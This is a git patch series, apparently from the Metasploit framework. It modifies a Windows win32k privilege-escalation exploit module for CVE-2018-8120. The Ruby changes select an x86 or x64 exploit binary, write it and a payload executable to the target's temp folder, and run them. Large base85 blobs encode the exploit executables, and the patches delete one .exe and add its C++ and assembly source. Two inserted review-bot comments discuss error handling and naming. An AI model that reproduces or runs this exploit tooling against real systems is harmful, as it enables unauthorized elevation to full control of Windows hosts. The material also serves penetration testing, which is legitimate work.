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 N7xno6*Z*V%{smv!`XK-S literal 0 HcmV?d00001 diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index f80b35391d..699b58d518 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -7,9 +7,9 @@ class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File - include Msf::Post::Windows::Priv include Msf::Exploit::EXE - include Msf::Post::Windows::Process + include Msf::Post::Windows::Priv + def initialize(info={}) super(update_info(info, @@ -30,15 +30,14 @@ class MetasploitModule < Msf::Exploit::Local 'Anton Cherepanov', # Vulnerability discovery 'Dhiraj Mishra ' # Metasploit module ], - 'Arch' => [ ARCH_X64 ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread', - 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' + 'EXITFUNC' => 'thread' }, 'Targets' => [ - [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ], + [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ] ], 'Payload' => { 'Space' => 4096, @@ -62,10 +61,6 @@ class MetasploitModule < Msf::Exploit::Local fail_with(Failure::None, 'Session is already elevated') end - if sysinfo['Architecture'] == ARCH_X86 - fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') - end - if sysinfo['OS'] =~ /XP/ fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') end 
@@ -78,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Local temprexe = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" write_file_to_target(temprexe,rexe) rescue - fail_with(Failure::Unknown, "Writing #{temprexe} to disk was unsuccessful") + fail_with(Failure::Unknown, "Writing #{rexename} to disk was unsuccessful") end vprint_good("File path: #{temprexe}") @@ -96,8 +91,23 @@ class MetasploitModule < Msf::Exploit::Local File.read(exec) end + def check_arch + sys_arch = sysinfo['Architecture'] + if sys_arch == ARCH_X86 || (sys_arch == ARCH_X64 && session.arch == ARCH_X86) + 'CVE-2018-8120x86.exe' + elsif sys_arch == ARCH_X64 + 'CVE-2018-8120x64.exe' + else + fail_with(Failure::BadConfig, "Invalid architecture") + end + end + def exploit - @payload_name = datastore['PAYLOAD'] + validate_target + cve_fname = check_arch + rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname) + raw = create_payload_from_file(rexe) + rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" vprint_status("EXE's name is: #{rexename}") exe = generate_payload_exe @@ -108,8 +118,6 @@ class MetasploitModule < Msf::Exploit::Local vprint_status("Preparing payload at #{cmd}") write_file(cmd, exe) vprint_status("Payload uploaded to temp folder") - rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') - raw = create_payload_from_file(rexe) script_on_target = write_exe_to_target(raw, rexename) command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" vprint_status("Location of CVE-2018-8120.exe is: #{command}") From cdc2918c84dcd3725638d3d9fbfd0572e07c4593 Mon Sep 17 00:00:00 2001 
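Review bot: The bare `rescue` in the `@@ -78,7 +73,7 @@` hunk throws the exception away, and the reworded message now carries only the random file name, so a failed upload is reported with neither a path nor a cause. Binding the error and appending it keeps the failure diagnosable: `rescue => e` followed by `fail_with(Failure::Unknown, "Writing #{rexename} to disk was unsuccessful: #{e.message}")`. If the session file API's own error class is what is expected here, rescuing that class alone would also stop unrelated bugs in the block from being reported as a write failure. The enclosing method starts and ends outside the hunk.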
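Review bot: `check_arch`, added in the `@@ -96,8 +91,23 @@` hunk, is named like a predicate, but it returns the file name of the bundled binary and aborts on an unknown architecture. It also never consults the `Arch` of the target selected from `Targets`, so the selected target and the uploaded binary can disagree. A name such as `exploit_binary_name` with a comment would make the contract plain, e.g. `# Returns the bundled binary matching the host/session architecture; a 32-bit session on a 64-bit host gets the x86 build.` The fallback branch would read more consistently with `Failure::NoTarget`, which the removed 64-bit-only check used, than with `Failure::BadConfig`. Whether `validate_target` reconciles the chosen target with `sysinfo` is not visible here, and `exploit` continues past the end of the hunk.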
From: Shelby Pace Date: Thu, 11 Oct 2018 11:42:51 -0500 Subject: [PATCH 31/39] removed original binary, added source --- data/exploits/CVE-2018-8120/CVE-2018-8120.exe | Bin 95744 -> 0 bytes .../exploits/CVE-2018-8120/CVE-2018-8120.sln | 28 + .../CVE-2018-8120/CVE-2018-8120.vcxproj | 154 ++++ .../CVE-2018-8120.vcxproj.filters | 27 + .../CVE-2018-8120/CVE-2018-8120/Source.cpp | 667 +++++++++++++++++ .../CVE-2018-8120/CVE-2018-8120/shellcode.asm | 70 ++ .../source/exploits/CVE-2018-8120/LICENSE | 674 ++++++++++++++++++ 7 files changed, 1620 insertions(+) delete mode 100644 data/exploits/CVE-2018-8120/CVE-2018-8120.exe create mode 100755 external/source/exploits/CVE-2018-8120/CVE-2018-8120.sln create mode 100755 external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj create mode 100755 external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj.filters create mode 100755 external/source/exploits/CVE-2018-8120/CVE-2018-8120/Source.cpp create mode 100755 external/source/exploits/CVE-2018-8120/CVE-2018-8120/shellcode.asm create mode 100755 external/source/exploits/CVE-2018-8120/LICENSE 
diff --git a/data/exploits/CVE-2018-8120/CVE-2018-8120.exe b/data/exploits/CVE-2018-8120/CVE-2018-8120.exe deleted file mode 100644 index 036dd38a1307ee9a5505822a095c2bee484a57f0..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 95744 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%0ArEwM5#f#?;j`@|qwFLeNn(I_Jw7EZT2k~x z628rwIms?uQ`$G}#pJP-_^i~o9UB}g&@88t8|^j<<^~9k#5A?n{IO!n+sqk^tjy9G zQZ>&jGS5+&=g(@Sewn4?nE6?KDQmx1!d&@>y78KB^y#JhjL+E>DA3!|E~I5$oAFQC zh8U?E1v27!jEl8dk9Tjw1c-imj$DaLd5i?6oIM3KDMWxfxyrM+6y z*i6JeB51KUK4s-4ijMLDG+NSZP2>-deO3%eaKi|gP9*7W*)0|B2(nj{xJ+0a#Wz1q zLUx^`h~Qc&p)N6LIrJAcUa@?)ZvxfHRsW`%(G;+X0*qJLT{6Sum)xh5LBhWytXr)x z_Q|(bO2mB=F5Rr}?$t|Czg{)JmnrEpnoZ(4Bn}&|(oFN3 zOYJ(OQHYV5*cq8vY~hsZn@IZL+9E$VB+Gy~$Rjte`wRqHzCW~+0s>6xtdf0SExjy+ z0*M(luzGOIpt{QPs4qy1EmouUyl`!+KIJniTKu-!{|mJIqokbCFhgfcv)HUtIWb}= z>pNR~mT$HypZzi!M+|H0J`|Cc{W8Mrm$657a~b<(6|z@`%5_~kMomSEtYAz}zqx5B zbbD;%V_z5f)31wc?jLEFxLBgHyfb5KDnntt#A*Hje62}d=Ykf|RwrGBwpy##9)JK( 
z;$1fiF(Pe=MwC)oWS)Du5StYpV0FMaO5%q`tT>mXJy&LuVrH;>^EV2Dy>Ho(pO||; zU{V|I-4c$MbUUo}^bc)0EDw~};$T3gXhtSH!h`i%>@ia+&Lg91zaF3bCWbgu_#1@h zN$Nw*Cwism!Z(jFV$2xzZPZVHU~WgP6B|ktZHzT1A-;aB8|CcQMvsr*;c3F{IRJ-m{A!&O5Ipd*v|Jemcdf!FlktS^XUwUt^iI6+C zo>SqR8OuWfQn}cATt;w=z3eF(DHhY(`NDYA(#*4J z$`8@TmfWdJuiw<$4!NQB8)#j;3mZfCys(k~hW1>f%oBgh8NEVua(cK%VtYbm%+^w( z+SO>|s`ACNiX9BHd>-D6z1SZ2BlP)9CzU6P&2Q)05Z`8z@h};Ub_@!$a{zM!`^j`l zFfz*?{p;{zQ0sH1Uvo0HK7Y{YjzE01`{IWV$BNB|KDDg4-(lwG3QPS^^>kURYV4op z(#u0PU>%UOA0@xGGv*$rs$|GhXn|MkZX)ePoUtRugwb85a&=*Q9CeUOp6%p9@yz0DngS);AqKa9Qol8dqjgEu69(BeBo5xW!JAj__PlG)nug4$tmhVv> zF?r^2(8h>wQuBj}En-suMgX_@>|$Z(`Mu99th}|^iVm!9dRJ@OLeTQv061(M zM&Mpp-l{#-S;t$5&;06UOKTc1Kulz&q;LKWHLcbnFok)bZOhhLT|3YvP4_v3r1xHnNzaJ&P0NF)yDJ0 zdo16V>y*&fbe7bPNyT_GSo(%*Z>Vxn$$age-{lKUekh>@(Rr%q>SVQZGY#@GXa!OS zM1%$;xTPYyMyV?^h!17TM|KmBqWMnko}Ii}RHZ!yrjS`~Q!nY-EDes*9Tb z7{EHHHWbwEdmi;NFPoymY-C!hY;{#_u_yv%b@PYOlayt{uqna3wtte@R=ZTG+G%tI zOE(9rI+lc)QhTv_uP%tl@&p$-FXD8}Gz!18kbbRTOUN6U3D*dAgxs(fmhv&|S3d=! 
zy3=0E_lbJTbe;TyKG7mKLGrN59?pRASQ0aE|8?T@z)g8Z;`kGNudE zLx$e_cVw8bQP`(u9WzM$L5yxi$g;y)W4xyb{0xd*FP0qH6AFR;NP3bcGrg9V|zw~>up!shLgMBAth5oEjao__+PO{%%{aMwlXK57WG zy8>tqsb>Y=@MRu-)0(^Jlj@;P$N%>pP6%pG(Z%?tyt;VrpqN&d7!`~^pC{zP=A8P} zB??rqvG1^Smc7aUx1D|ANxQS3LpA@cv)#b@b@rX`kgx=gU~i$@u`#Yl(M4dp0A)eWVcVtuHPuQH=;UFs{$ z9k7kLP|HtBHxmo_IfeG&Js}(-GtjPGS*9|Q&e;4!k;4&w z5-JtW4L|ua1z{2zEdCgws*hJaktVX^A40+ewIA$IMugYxe#2^lRc~r{9cKJfj{{Nk zrHZaLI#{7It-B&qsE859=G2c#Y55kbLXGxR3&A6^FtwZ@y2c#{j;Rln8Y7}-(tRcF z26}d73PcA58!k9bYkGtf<}XRx;TQwqnI*g?ic^mhUAk8UjHIl~qHbRFrcBm{N*-hZ z$Dc#i@toD;TG`$^R<=B{_QyX6)EL)$Y7A8MZ&uWle%TYuud6XWi5M8mQd;vH)EqRv zqq95M$R7b_s8$b9f%QD({?KsFx%uCI(tr#?VjZckz@ji(+gs z!gO9jM%H*1`kGz#l)@uRUdEfxl0`R~*HRQEV$dU{3SrQ|ouSpk9G|Essu$)Gu?Shd zH~uCGBPD*eeHTxV5su*o5G#xyve1s}+pqSu=op+$%s;(hS&g;D7K?PewgmHo zm?>(D_)!TkCaz;ziR9^+=8;F^%;LPESx0}_fC2XmRX+elWI)&DJmo)#w zlZ4Qy#aPoySWjS`Z&|C}W-|ADKGc=yNTWe0vDtlF86I37bK-1C$$pi4 zaHbU*Eh?E;mt+IY8g^7E+avBJMx%fp&5MnUcjhHjVDq$MXSzTu$~&N~V*3q`BSF02 zz4#bC$`6NU!gUGt8tzX|%1*dlB6!i)PjrOFdhu&zMxpoZsxjV*5H$-gUbfAdSo74@ zYKS+XycK+w8GHGTnD0U|<`3RwiRJ)60!K+K;%AsEiO8r~*Red7Z>gwxG>TVD^~3Rp zr6XUV5+=#rkFY>8%p|O=wZ92{aE8e0tos6+Sp5k&W&sgR;Kl2=$c?PK;c=Jcd6trV! 
zyl;W_gF+-Rtw|GUwl9eO1=+^?rfE&cagJp0=|6xHG@QSy=*zUGBu!r{?XT+8n!ZWi zc;A)LQSrX(wWgn{G__h28)uHx9@0SbBE5McsJpX-QB>&$_8BY<6E>U$JgBXIZ}5_0 zZG*@#EKN#=5eddjJxCy=Z5S^|j-*x-(v7jdIR$cn#T^>eEHl%M29^70;|6;D{ z!3R)6LdY3oO4icoRa&SwS9x{Q0j=rV)IjA7nXZM#Uakr|fCts7p^A~wle8y?h%3E$ zK}Z!&YhCPoDY1Gp;?0WJWW!4}J5)KRWSQ2y1dbZ)*&NWCCPJ;!7mpS{1S0ET+*d2t z2wwEmaRTkv%B<|?$#z;IsCye*iM=y`}Ezz1*Go|8vF|A34 zJKhIYULz(Md@NlJrn4Osbbl;U85>fewX-f%S;RRfW(Mn4w;YzS$NZOM-2jIZTz;g9 z=eUDe9aN4S!42XeS>4pLd}%Nl_SeN*XD4Ux5e@Qc!Q8d!1wpl=B`Ge+Bp!S)eNot$ ze1rtey!~qO3rEj~(Nrg|^b5+}b&2!Sd5QD0$V~l$Q50MSm2KEA&X`l8uXQwltLEDrk7cTx-NKMK*UX7;EMbuNHZ3vb0rcZ=n$a9p6EvP|v>P@?=SsZ(hB=*8u zmV3en_e$qI)DatGm+Y!GFpn%RPz0489E`trFj!>;wM#6{&4`~-^5;8+u<;?>a>`Z^ zf_2E+*}P?yTbR{}a)PNf3?n&+NZOj5S{CoET$$(E+yZrPOTQ#Ujo2Y2K&&Cg!fF@W zO7lUO0&~B)b!{2r5cO2Jw5G$toULuli56Gt69TcJb)l->STI9#Pm&>6)fasBH);?s z>60RZRbQ<WMFU3I4DYPDD4Uv9}CYw>X^qaRBrYL zwdYV)}K0r0~Z zJKEmkDAn>kqe_^&23BJ2S|{^@Ui8I|gBm5#hbKy+ANNnBrhTBID&|q61CE3ZMbS6~ zf3PB9S^q*-WQ3hjZEdNP30Yp9`rMApiw^)4Ia#6k&X4(2%5^e)NNZBW zRir9!t%TRc>OslMo3XJ5+5U&w*bD}fQikDR!?Ip5e;TwIZEaU`>&i29ra-+|X6B0( zD`39Fj10TJr2EZ1tJX&hVe)jTK0V>cJG%{tvjJR^vrSiRc^UlKEkB+%QG(#Hxo6qQ z((>pSyXAtgOv`^oRT)&(~&Y-C+9 zzASHIYzSHMC5x7tNg`n78Q6pztVc_oqhRK|x?olN(h>SPXVG1dHI3DN)27`u6sRnk zXbp^(8Yo%ov#i*JxU-lPd?`mi>bK5_oe(to@k*JxvPQHChu>+Xy~)WNr0>a9W^(c} zfu7j7GdF*4|Lmn2GE zAt|VVZbifK-czFASSRxc?2cb2(gH6d6*X72Y0YQY#d%UEWy(zz+b_9T%C_!^@j?u{1e@$VKnV(y^jU@yTj zLwp$6bQI&HJ3iP-=ULg43C(*}M!s$jHEi^S#brf%DrKup+EY8MZRY)qRQy7GC7buJ z`uDLLO9;ry-{RQva$71rf#QHLMTbUJfYl+Y z=9ih%C)m~2ByZ1)`QlY);GMyyn@lv_cv<;!Gn;qBs}QL|2?VxdH9Nn(0iW3i`49OW zl#Be%d_{hrFfuE@?}hAg@;kKo1?>7!CBCN^{CZn-pA#~=2nl1DFC?Ml_F3kc>=T)< z?iKp!%*gHy$nILxc?iBe(~ASx9X)?XOl`hfrU3?`+mY#UfQXOAhF!ZWn7k-Y{CQ6f z8!U!f5vO1K8>q*n7th|v&0FV1T=#U&YQo3QRfB;QPu*3>F&^f9a;o?P|5;Mw*gKlc zVPm5>_2Szbxw&m#jjO3mG6wMg#=G|s$&+cLY*aizIJEl0tgaw57P7U4mg*+p-^1P+P*pTR8yXziL>tV#J|4JRizD=VhLH<~ca?9B-#@9?X-K)>aE{V!X7bt7w{13s4PtK`q!0hL5NP#VY!; z=q>TSd0NwE70Rjua!MiIhdS_kvZThqM#DxmYx?sj0Ikt;vYNoDNdNFW^nhVMfk`P_ 
zeCfvBy{Y%$$AYn0sn>-w8)JVr%IQcw&wEywb}N1xHm-40S9M`rWnPNZ-zIgCrU*o8 zO&CZ;=+71{qUZt&V*N?I0_d2sj^vD<#-dS!$ID!#YW68=jCM0VJtKEVM^oNBI_OAi z!PV8hgs_ru=Fk?wQ{uBr+}+5TPt5z^7i{g zDS7)b^@6O`&{DspvO9(D%g>TUY&zOun)u3Z!Z#m1Xgl`e5ugRay)=;D@n4JA7 z8cI!i))9d_$hwxE95(J$!)rdYGbd%=XX{A*{vx)*TWXOEWKP6BR=BnaCH)Pd3?*DM zqCK1a(b2LcwT#z5v;gV4x;H(BVdCLaaRX{2~dYNuZ*h;#Fv4yIeQAY<- zDKlYULsgm9^d;j-dN#5`n_Xq84++MG1RJbx#V*LS?z~LPf{kDP2I$IDgUM$~vQl;P z8%nBfk*QUnBsi593#hrCIne5_DFYo{vzOk)|J3qV$6Q z5T)N$Qu59bA|-!El`!{FC<}pGnwyoPf3M)P`@gc&L@}4CHLUU)K^@v4}t(`T=Re9!|sTp<=n`q2kgW3BmRWs7h!c6r^m5=`Wm257Ov=#fa z>OuNU^YqZ_otoU3)lSO=%{mIs4$4R@RBaZ6v|1h;lL4HLYnh4C_-K=IP z!g33Tz8@6Hni+Vty%w?Jt^XrJtL=Qk#5UY-qzO=fv1xwdpHS>H8;_tH=qt z$Q~`-aOS+p{{Iwj>tKMgDqIa?el(~(xl=6>W~}W|~enXpriO z_y!-HK#W}ACUr;z#Rg>H(bdL{YMv-I-A8n_(Utmy=Zs{@Z<#zD)yV}V=JaIA{M3F0 zeOpP;D)X3NW`SeG=7`L@PKrGu^UhH+?{gi=tjs$nB_7@6^+$tzp90l4Sf$aE`93Q; zobNKNIcAsPNiE70ma4U1oT)421q>FXX4z4BsTsToM&`?x5^(3pn@G8IMByrR3Tez1 zcyz|n=*6V>RHO&QflCK0NUEE?(noOs4ulQ}o= zb#n7K>mtuGuWsbEa1J$3d$KL<5m$>t%oQ9cV)+AI{lw_)|C<~gSe=oh1FJ=jZng#5 z{}1KpDYhJ49$bAyjFy!+%$+(HTCrgwMGv(F=)YZPehz*Sq4)f+B6M!QX(4`k^?r^I zDkpk59&5a2{(T=i5HpMQ+U}mVyJDlvS9ZvVA@MrYQBEf01cs%jEfDpZ>lN%|VClEZ zt)4b#badhlPfuHs)|4Pp4EFK24r9kp%q-?yD6n|f$6}qIR{RIGQE`rWnvAWzxe*;= zj+KIb9u=I{|T>1JnrX51fIQmn~ZBH}B@m+=y0OCz8JB zyiP~YRD6_1!RB7z97mq{Jz9fT4idD?Oxbf-%@$jWGd)t-KE+U4MpEN>^A=Tc)mK_` z2Pw5DWhV}ers6+tJUZHM5i>&Is51xtukmNMBo2O#fTeC(M=3l~x^@MxwX-*WTv%W3+bZ!U5 za^QVQWnBk%{%|0DAnU^Qg$>tNG^`F*l&oqARsg9SG>F()p_c0-x=YD`5nAOI)h>{qTjhxH`w$E;&X#~KRehn zz!{y%wXD9=A1?DH19q*)78&|Z*@dx0PHTfdO!<1pUIg;Ij8aSxKPWQ 